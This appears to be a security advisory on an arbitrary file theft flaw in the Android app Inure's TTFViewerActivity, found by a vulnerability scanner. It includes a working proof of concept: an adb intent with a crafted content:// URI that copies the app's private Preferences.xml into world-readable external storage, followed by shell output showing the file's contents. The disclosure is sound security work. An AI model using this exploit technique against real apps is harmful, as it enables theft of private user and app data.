Through the use of Oversecured, leading vulnerability scanner for Android and iOS applications, we were able to detect anTheft of Arbitrary Files vulnerability within TTFViewerActivity.kt
. Check full issue definition in the image below:
The TTFViewerActivity
failed to adequately validate the incoming intent.data
prior to forwarding it to the openInputStream
function, creating a potential vulnerability for accessing arbitrary files. For instance, an opportunity existed to utilize content:// data using the Inure application’s file provider scheme, thereby enabling the extraction of files from its internal directory.
Extraction of the opened files was facilitated by their storage in a directory that was publicly accessible. This was due to the fact that the activity utilized context.getExternalFilesDir
to save the files in that location.
This attack was chained with an insecure usage within the provider paths, which further contributed to the exploit:
Access your device shell using adb shell
then navigate to /storage/emulated/0/Android/data/app.simple.inure/files/font_cache
in order to examine the contents of the directory. For now it’s empty:
angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $ ls -la
total 6
drwxrwx--x 2 u0_a508 sdcard_rw 3488 2023-08-25 07:18 .
drwxrwx--x 4 u0_a508 sdcard_rw 3488 2023-08-24 22:30 ..
Send the following intent:
adb shell am start -n app.simple.inure/.activities.association.TTFViewerActivity -d "content://app.simple.inure.provider/root/data/data/app.simple.inure/shared_prefs/Preferences.xml" -a "android.intent.action.VIEW" -t "font/ttf"
Review the font_cache
directory again and notice that the Preference.xml was saved:
angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $ ls -la
total 10
drwxrwx--x 2 u0_a508 sdcard_rw 3488 2023-08-25 07:22 .
drwxrwx--x 4 u0_a508 sdcard_rw 3488 2023-08-24 22:30 ..
-rw-rw---- 1 u0_a508 sdcard_rw 771 2023-08-25 07:22 Preferences.xml
angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $ cat Preferences.xml
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
<boolean name="apk_external_storage" value="false" />
<boolean name="is_external_storage" value="false" />
<int name="app_accent_color" value="-29592" />
<boolean name="dont_show_again" value="true" />
<int name="main_app_launch_count" value="13" />
<boolean name="is_custom_color" value="false" />
<int name="view_positions" value="7" />
<int name="notes_list_type" value="0" />
<boolean name="disclaimer_agreed" value="true" />
<string name="last_search_keyword"></string>
<string name="home_path">/data/user/0/app.simple.inure/app_HOME</string>
<long name="crash_timestamp" value="-1" />
<boolean name="deep_search_keyword_mode" value="false" />
</map>
angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $